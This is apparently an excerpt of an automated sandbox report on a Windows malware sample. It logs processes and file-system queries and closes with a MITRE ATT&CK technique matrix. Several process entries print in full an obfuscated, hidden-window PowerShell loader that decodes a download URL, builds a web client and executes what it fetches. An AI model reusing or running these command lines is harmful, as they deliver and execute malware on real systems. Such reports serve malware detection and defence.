HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrdinuHiplir SysteP.pulsHyJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sublicense = 1;$solbatteri='sub';$solbatteri+='strin';$solbatteri+='g';function udvindende($twistende){$lastelinie=$twistende.length-$sublicense;for($firblok=5;$firblok -lt $lastelinie;$firblok+=6){$lunelsen+=$twistende.$solbatteri.invoke( $firblok, $sublicense);}$lunelsen;}function unschool($squimmidge){. ($jetmotoren) ($squimmidge);}$pedicures=udvindende 'testimmiljlointerzshel imil.elcol.clbifigaovers/stepp5ne kw. a er0ego r konku(indskwin vii.ernin kaksdtrillobyggewkoreisdu,st o,debn xenotprisl matem1unher0 inla.pr,fa0samme;ote.t brnesw ,isciaureansenso6under4glyce; ihra notatxsoci 6 f.ap4terzi; honn gyro.rhoultv s,ns:spell1oli.t2indbl1s end.capit0kratt)c,oic genetgrysteepremac,mudsknonubodevis/ s or2misdd0.dgan1misha0stjyd0velst1haa d0 s,ip1.ndig noradfor iei nergrse eredy.tbffluoroindpaxsludr/mod.r1spu.r2 smut1ugl,d.ingra0se ue ';$privileged=udvindende 'ob,diua.dsesmsk,ne ,arar matr-jord.auterog reesebe trnte.tatdis i ';$sprngningers=udvindende 'juncah,ripyt sfyrtsupr.pfa.lesf,rpo:prunt/argum/ d.scwelskowmumifw hers.dollasacidoesemilnmisled lyndsimparpkendea unnic ugeaethist.dokhacomnipo ugtim.allw/curetp o firstipuogl zi/guerid skablba st/jogurwintralvitr oshirtrsamfuhslvsmssk,dk ';$forlovede=udvindende 'rel,a>r,kla ';$jetmotoren=udvindende 'cor,ii klisecuchix kyse ';$tendrilous='handleformerne';$veta13 = udvindende 'skytsecentrcallithunguio tu.i ,ndka%mbleramonocp intepforstd filiahikketteg,vaya.ne% ou.w\cytopfvetere,likvtsa.tlta.riglmelleejakob.tugtehtoilfaun,ernpuebl folk&nonpa&l.dar xx.ndedeamic regihincanorhila betint.agua ';unschool (udvindende 'flo,r$cypriglevnelsluk ouns ib in.lacompulr,tsf:nedgrsovertasjoflludsteusorbet druke waver.uadresnil,r samo=hneky(yderzcnain m compd arga helt/hetercdekup ,ylli$askebvdusineflowethal,tafar,e1 akva3tjrne) aktf ');unschool (udvindende ' ustk$teh ng ddssl,ndelosentibretirasaddll thor:sacchfp.ereludgandnavernseedeikphesn ove,ggrnsesindstt undeiarched alkiedisk,n ove,sratin=inter$.tults sentp udvirbenzin vantgp rapnkis.lid,rignposefgsub eetravbr nonss mand. ginnsrnerepallesl smediaktiotminke( rejs$antiffj sovoner,orw.resl stroocheefvnaadsebirdidtree e fi.s)gulds ');$sprngningers=$fldningstidens[0];$unaccidented180= (udvindende 'phyll$affejgsandwlbolvro k inbl peaahac,bl jagt:lngstbsiolaa harrsprotoiallemc tornh de.mrclassomell mcutt iforr okalibl skrfec.nce=remi nxericegreenw arry-n.npeokajakbuvejsj zoquebioc,calgovt rotu .nchsconvey geogstermitretteeberrimroege.h gisn.antaeinductgtehu.gr ndwer bre s,lvbholoccmargal aktai ko.oelocasn usigt');$unaccidented180+=$saluterer[1];unschool ($unaccidented180);unschool (udvindende 'disle$ski,db.aphoarejems de.fibage c prochunshirvip.tod alymcurviistalaomichelzon,newall,.ko.sehfiskeeu.cita spelddezine n.hersentistaste[ pulv$smagspstjerr th riunderv fanaitillalp.odue turbgkonveetilskdmorfo]ubety=e hel$ planphoarseekspod molli holdcordinuhiplir systep.pulshy
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$sublicense = 1;$solbatteri='sub';$solbatteri+='strin';$solbatteri+='g';function udvindende($twistende){$lastelinie=$twistende.length-$sublicense;for($firblok=5;$firblok -lt $lastelinie;$firblok+=6){$lunelsen+=$twistende.$solbatteri.invoke( $firblok, $sublicense);}$lunelsen;}function unschool($squimmidge){. ($jetmotoren) ($squimmidge);}$pedicures=udvindende 'testimmiljlointerzshel imil.elcol.clbifigaovers/stepp5ne kw. a er0ego r konku(indskwin vii.ernin kaksdtrillobyggewkoreisdu,st o,debn xenotprisl matem1unher0 inla.pr,fa0samme;ote.t brnesw ,isciaureansenso6under4glyce; ihra notatxsoci 6 f.ap4terzi; honn gyro.rhoultv s,ns:spell1oli.t2indbl1s end.capit0kratt)c,oic genetgrysteepremac,mudsknonubodevis/ s or2misdd0.dgan1misha0stjyd0velst1haa d0 s,ip1.ndig noradfor iei nergrse eredy.tbffluoroindpaxsludr/mod.r1spu.r2 smut1ugl,d.ingra0se ue ';$privileged=udvindende 'ob,diua.dsesmsk,ne ,arar matr-jord.auterog reesebe trnte.tatdis i ';$sprngningers=udvindende 'juncah,ripyt sfyrtsupr.pfa.lesf,rpo:prunt/argum/ d.scwelskowmumifw hers.dollasacidoesemilnmisled lyndsimparpkendea unnic ugeaethist.dokhacomnipo ugtim.allw/curetp o firstipuogl zi/guerid skablba st/jogurwintralvitr oshirtrsamfuhslvsmssk,dk ';$forlovede=udvindende 'rel,a>r,kla ';$jetmotoren=udvindende 'cor,ii klisecuchix kyse ';$tendrilous='handleformerne';$veta13 = udvindende 'skytsecentrcallithunguio tu.i ,ndka%mbleramonocp intepforstd filiahikketteg,vaya.ne% ou.w\cytopfvetere,likvtsa.tlta.riglmelleejakob.tugtehtoilfaun,ernpuebl folk&nonpa&l.dar xx.ndedeamic regihincanorhila betint.agua ';unschool (udvindende 'flo,r$cypriglevnelsluk ouns ib in.lacompulr,tsf:nedgrsovertasjoflludsteusorbet druke waver.uadresnil,r samo=hneky(yderzcnain m compd arga helt/hetercdekup ,ylli$askebvdusineflowethal,tafar,e1 akva3tjrne) aktf ');unschool (udvindende ' ustk$teh ng ddssl,ndelosentibretirasaddll thor:sacchfp.ereludgandnavernseedeikphesn ove,ggrnsesindstt undeiarched alkiedisk,n ove,sratin=inter$.tults sentp udvirbenzin vantgp rapnkis.lid,rignposefgsub eetravbr nonss mand. ginnsrnerepallesl smediaktiotminke( rejs$antiffj sovoner,orw.resl stroocheefvnaadsebirdidtree e fi.s)gulds ');$sprngningers=$fldningstidens[0];$unaccidented180= (udvindende 'phyll$affejgsandwlbolvro k inbl peaahac,bl jagt:lngstbsiolaa harrsprotoiallemc tornh de.mrclassomell mcutt iforr okalibl skrfec.nce=remi nxericegreenw arry-n.npeokajakbuvejsj zoquebioc,calgovt rotu .nchsconvey geogstermitretteeberrimroege.h gisn.antaeinductgtehu.gr ndwer bre s,lvbholoccmargal aktai ko.oelocasn usigt');$unaccidented180+=$saluterer[1];unschool ($unaccidented180);unschool (udvindende 'disle$ski,db.aphoarejems de.fibage c prochunshirvip.tod alymcurviistalaomichelzon,newall,.ko.sehfiskeeu.cita spelddezine n.hersentistaste[ pulv$smagspstjerr th riunderv fanaitillalp.odue turbgkonveetilskdmorfo]ubety=e hel$ planphoarseekspod molli holdcor
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sublicense = 1;$solbatteri='sub';$solbatteri+='strin';$solbatteri+='g';function udvindende($twistende){$lastelinie=$twistende.length-$sublicense;for($firblok=5;$firblok -lt $lastelinie;$firblok+=6){$lunelsen+=$twistende.$solbatteri.invoke( $firblok, $sublicense);}$lunelsen;}function unschool($squimmidge){. ($jetmotoren) ($squimmidge);}$pedicures=udvindende 'testimmiljlointerzshel imil.elcol.clbifigaovers/stepp5ne kw. a er0ego r konku(indskwin vii.ernin kaksdtrillobyggewkoreisdu,st o,debn xenotprisl matem1unher0 inla.pr,fa0samme;ote.t brnesw ,isciaureansenso6under4glyce; ihra notatxsoci 6 f.ap4terzi; honn gyro.rhoultv s,ns:spell1oli.t2indbl1s end.capit0kratt)c,oic genetgrysteepremac,mudsknonubodevis/ s or2misdd0.dgan1misha0stjyd0velst1haa d0 s,ip1.ndig noradfor iei nergrse eredy.tbffluoroindpaxsludr/mod.r1spu.r2 smut1ugl,d.ingra0se ue ';$privileged=udvindende 'ob,diua.dsesmsk,ne ,arar matr-jord.auterog reesebe trnte.tatdis i ';$sprngningers=udvindende 'juncah,ripyt sfyrtsupr.pfa.lesf,rpo:prunt/argum/ d.scwelskowmumifw hers.dollasacidoesemilnmisled lyndsimparpkendea unnic ugeaethist.dokhacomnipo ugtim.allw/curetp o firstipuogl zi/guerid skablba st/jogurwintralvitr oshirtrsamfuhslvsmssk,dk ';$forlovede=udvindende 'rel,a>r,kla ';$jetmotoren=udvindende 'cor,ii klisecuchix kyse ';$tendrilous='handleformerne';$veta13 = udvindende 'skytsecentrcallithunguio tu.i ,ndka%mbleramonocp intepforstd filiahikketteg,vaya.ne% ou.w\cytopfvetere,likvtsa.tlta.riglmelleejakob.tugtehtoilfaun,ernpuebl folk&nonpa&l.dar xx.ndedeamic regihincanorhila betint.agua ';unschool (udvindende 'flo,r$cypriglevnelsluk ouns ib in.lacompulr,tsf:nedgrsovertasjoflludsteusorbet druke waver.uadresnil,r samo=hneky(yderzcnain m compd arga helt/hetercdekup ,ylli$askebvdusineflowethal,tafar,e1 akva3tjrne) aktf ');unschool (udvindende ' ustk$teh ng ddssl,ndelosentibretirasaddll thor:sacchfp.ereludgandnavernseedeikphesn ove,ggrnsesindstt undeiarched alkiedisk,n ove,sratin=inter$.tults sentp udvirbenzin vantgp rapnkis.lid,rignposefgsub eetravbr nonss mand. ginnsrnerepallesl smediaktiotminke( rejs$antiffj sovoner,orw.resl stroocheefvnaadsebirdidtree e fi.s)gulds ');$sprngningers=$fldningstidens[0];$unaccidented180= (udvindende 'phyll$affejgsandwlbolvro k inbl peaahac,bl jagt:lngstbsiolaa harrsprotoiallemc tornh de.mrclassomell mcutt iforr okalibl skrfec.nce=remi nxericegreenw arry-n.npeokajakbuvejsj zoquebioc,calgovt rotu .nchsconvey geogstermitretteeberrimroege.h gisn.antaeinductgtehu.gr ndwer bre s,lvbholoccmargal aktai ko.oelocasn usigt');$unaccidented180+=$saluterer[1];unschool ($unaccidented180);unschool (udvindende 'disle$ski,db.aphoarejems de.fibage c prochunshirvip.tod alymcurviistalaomichelzon,newall,.ko.sehfiskeeu.cita spelddezine n.hersentistaste[ pulv$smagspstjerr th riunderv fanaitillalp.odue turbgkonveetilskdmorfo]ubety=e hel$ planphoarseekspod molli holdcordinuhiplir systep.pulshyJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$sublicense = 1;$solbatteri='sub';$solbatteri+='strin';$solbatteri+='g';function udvindende($twistende){$lastelinie=$twistende.length-$sublicense;for($firblok=5;$firblok -lt $lastelinie;$firblok+=6){$lunelsen+=$twistende.$solbatteri.invoke( $firblok, $sublicense);}$lunelsen;}function unschool($squimmidge){. ($jetmotoren) ($squimmidge);}$pedicures=udvindende 'testimmiljlointerzshel imil.elcol.clbifigaovers/stepp5ne kw. a er0ego r konku(indskwin vii.ernin kaksdtrillobyggewkoreisdu,st o,debn xenotprisl matem1unher0 inla.pr,fa0samme;ote.t brnesw ,isciaureansenso6under4glyce; ihra notatxsoci 6 f.ap4terzi; honn gyro.rhoultv s,ns:spell1oli.t2indbl1s end.capit0kratt)c,oic genetgrysteepremac,mudsknonubodevis/ s or2misdd0.dgan1misha0stjyd0velst1haa d0 s,ip1.ndig noradfor iei nergrse eredy.tbffluoroindpaxsludr/mod.r1spu.r2 smut1ugl,d.ingra0se ue ';$privileged=udvindende 'ob,diua.dsesmsk,ne ,arar matr-jord.auterog reesebe trnte.tatdis i ';$sprngningers=udvindende 'juncah,ripyt sfyrtsupr.pfa.lesf,rpo:prunt/argum/ d.scwelskowmumifw hers.dollasacidoesemilnmisled lyndsimparpkendea unnic ugeaethist.dokhacomnipo ugtim.allw/curetp o firstipuogl zi/guerid skablba st/jogurwintralvitr oshirtrsamfuhslvsmssk,dk ';$forlovede=udvindende 'rel,a>r,kla ';$jetmotoren=udvindende 'cor,ii klisecuchix kyse ';$tendrilous='handleformerne';$veta13 = udvindende 'skytsecentrcallithunguio tu.i ,ndka%mbleramonocp intepforstd filiahikketteg,vaya.ne% ou.w\cytopfvetere,likvtsa.tlta.riglmelleejakob.tugtehtoilfaun,ernpuebl folk&nonpa&l.dar xx.ndedeamic regihincanorhila betint.agua ';unschool (udvindende 'flo,r$cypriglevnelsluk ouns ib in.lacompulr,tsf:nedgrsovertasjoflludsteusorbet druke waver.uadresnil,r samo=hneky(yderzcnain m compd arga helt/hetercdekup ,ylli$askebvdusineflowethal,tafar,e1 akva3tjrne) aktf ');unschool (udvindende ' ustk$teh ng ddssl,ndelosentibretirasaddll thor:sacchfp.ereludgandnavernseedeikphesn ove,ggrnsesindstt undeiarched alkiedisk,n ove,sratin=inter$.tults sentp udvirbenzin vantgp rapnkis.lid,rignposefgsub eetravbr nonss mand. ginnsrnerepallesl smediaktiotminke( rejs$antiffj sovoner,orw.resl stroocheefvnaadsebirdidtree e fi.s)gulds ');$sprngningers=$fldningstidens[0];$unaccidented180= (udvindende 'phyll$affejgsandwlbolvro k inbl peaahac,bl jagt:lngstbsiolaa harrsprotoiallemc tornh de.mrclassomell mcutt iforr okalibl skrfec.nce=remi nxericegreenw arry-n.npeokajakbuvejsj zoquebioc,calgovt rotu .nchsconvey geogstermitretteeberrimroege.h gisn.antaeinductgtehu.gr ndwer bre s,lvbholoccmargal aktai ko.oelocasn usigt');$unaccidented180+=$saluterer[1];unschool ($unaccidented180);unschool (udvindende 'disle$ski,db.aphoarejems de.fibage c prochunshirvip.tod alymcurviistalaomichelzon,newall,.ko.sehfiskeeu.cita spelddezine n.hersentistaste[ pulv$smagspstjerr th riunderv fanaitillalp.odue turbgkonveetilskdmorfo]ubety=e hel$ planphoarseekspod molli holdcorJump to behavior
              Source: AutoIt3_x64.exe.8.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation              		1
              Registry Run Keys / Startup Folder              		112
              Process Injection              		221
              Masquerading              		OS Credential Dumping111
              Security Software Discovery              		1
              Taint Shared Content              		1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts11
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              Registry Run Keys / Startup Folder              		1
              Disable or Modify Tools              		LSASS Memory2
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell              		Logon Script (Windows)1
              DLL Side-Loading              		131
              Virtualization/Sandbox Evasion              		Security Account Manager131
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook112
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture13
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information              		LSA Secrets2
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
              Software Packing              		Cached Domain Credentials12
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Timestomp              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
